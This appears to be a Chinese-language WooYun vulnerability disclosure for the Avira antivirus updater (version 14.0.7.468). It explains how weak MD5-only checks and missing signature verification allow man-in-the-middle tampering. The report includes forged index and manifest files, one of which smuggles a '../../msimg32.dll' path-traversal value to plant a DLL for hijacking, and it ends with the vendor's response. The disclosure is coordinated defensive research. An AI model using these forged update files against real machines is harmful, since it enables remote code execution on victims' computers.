当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087483

漏洞标题:小红伞(Avira)杀毒软件升级过程存在缺陷(可被中间人攻击利用植入木马)

相关厂商:小红伞(Avira)

漏洞作者: 内谁

提交时间:2014-12-17 11:30

修复时间:2015-03-17 11:32

公开时间:2015-03-17 11:32

漏洞类型:非授权访问/认证绕过

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-17: 细节已通知厂商并且等待厂商处理中
2014-12-22: 厂商已经确认,细节仅向厂商公开
2014-12-25: 细节向第三方安全合作伙伴开放
2015-02-15: 细节向核心白帽子及相关领域专家公开
2015-02-25: 细节向普通白帽子公开
2015-03-07: 细节向实习白帽子公开
2015-03-17: 细节向公众公开

简要描述:

小红伞(Avira)杀毒软件最新版本(14.0.7.468),升级过程可被中间人攻击利用,可使得获得更新程序的机器被植入任意EXE文件。

详细说明:

小红伞的升级过程较为复杂,大致要分为两步索引,两步描述,最终才下载所需的模块文件,虽然每步的描述文件或索引文件都有校验,但校验过于简单,仅仅是通过MD5对文件进行了校验,且最终文件没有进行数字签名校验,导致攻击者有可乘之机,以下的利用步骤测试均为中文免费个人版,收费版本未测试,详细情况如下:
1、从URL地址:http://personal.avira-update.com/update/idx/master.idx下载主索引文件,这个文件描述的是一个生成日期,伪造文件内容如下:

CRDATE=20140206_0032
<e0d1ebd2939e73f0bcf0c319c9aa654e>


2、从URL地址:http://personal.avira-update.com/update/idx/wks_avira13-win32-zhcn-pecl.idx下载第二个索引文件,这个文件描述的是一些产品相关的信息,包括产品信息包的文件路径,还有哈希值,伪造文件内容如下:

CRDATE=20141215_1006
PRODUCTINFO=/idx/wks_avira-win32-zhcn-pecl.info.gz
UPDATEROOT=/
PRODUCTINFOHASH=wks_avira-win32-zhcn-pecl.info,c14bb3445405d488c915690e9e68150f
<bbd837127dd33aeead37fdc1cf514bd8>


3、从URL地址:http://personal.avira-update.com/update/idx/wks_avira-win32-zhcn-pecl.info.gz下载要升级的模块信息,伪造的文件内容如下:

<?xml version="1.0" encoding="iso-8859-1"?>
<!-- generated with updatecompiler 1.2.0.39 -->
<UPDATE>
<VERSION value="11.0.0.1"/>
<NAME value="AntiVir OEM"/>
<DATE value="Thu Dec 15 10:06:29 2011"/>
<MODULE NAME="VDF">
	<DESTINATION value="%INSTALL_DIR%\;OS=ALL"/>
	<SOURCE value="./"/>
	<INCLUDE value="vdf.upd"/>
	<ENGINE_VDF_SET value=""/>
</MODULE>
<MODULE NAME="MAIN">
	<DESTINATION value="%INSTALL_DIR%\;OS=ALL"/>
	<SOURCE value="./"/>
	<Group value="product"/>
	<FILE>
		<NAME value="../../msimg32.dll"/>
		<FILEMD5 value="2b5faad18db50b36c53026603a2a4680"/>
		<PEFILEMD5 value="2b5faad18db50b36c53026603a2a4680"/>
		<FILESIZE value="359461"/>
		<ZIPMD5 value="aeafe1199958520d797ad4dc8d884a69"/>
		<ZIPSIZE value="154842"/>
		<OS value="ALL"/>
	</FILE>
</MODULE>
<MD5 value="c482fc0a8dfb3792c791b14aaf81c944"/>
</UPDATE>


需要特别说明的是:如果中间人想攻击目标,伪造这个文件是最为合适的,因为这个文件中描述了要升级文件的哈希,大小等等,并且在这一步可以构造一个相对路径,来使得最终下载后的文件放到合适的路径,另外,这个文件要用gzip压缩传输。
4、从URL地址:http://personal.avira-update.com/update/idx/vdf.info.gz下载另一个模块的描述信息,这个文件同样适用gzip压缩传输:

<?xml version="1.0" encoding="iso-8859-1"?>
<!-- generated with updatecompiler 1.2.0.39 -->
<UPDATE>
<VERSION value="0.0.0.1"/>
<NAME value="AntiVir OEM"/>
<DATE value="Fri Apr 23 20:20:48 2010"/>
<MODULE NAME="VDF">
	<DESTINATION value="%INSTALL_DIR%\;OS=ALL"/>
	<SOURCE value="./"/>
	<VdfDate value="20100423_0000"/>
</MODULE>
<MD5 value="375a49d59ed59808277c1d7a5cf07801"/>
</UPDATE>


5、根据第3步下载的文件中描述的MAIN模块的路径,来下载最终的模块文件,URL类似:http://personal.avira-update.com/update/../../msimg32.dll,这个文件下载后,就会发到我们计算好的相对路径中,未做数字签名校验,最终导致DLL劫持注入,执行攻击者代码的后果。
以上升级步骤,自动升级和手动升级效果相同(默认6小时自动升级)。

漏洞证明:

攻击者未攻击之前升级截图:

Windows XP Professional-2014-12-17-11-22-26.png


攻击后的升级截图:

Windows XP Professional-2014-12-17-11-04-30.png


攻击后5分钟左右,后台某组件启动,实现了DLL劫持注入,截图:

Windows XP Professional-2014-12-17-11-17-36.png

修复方案:

加密升级过程,校验下载文件数字签名。

版权声明:转载请注明来源 内谁@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-12-22 08:23

厂商回复:

对于中间人攻击条件,是较强的前提条件,对于所述篡改伪造后的情况,可以认定为存在认证风险。

最新状态:

暂无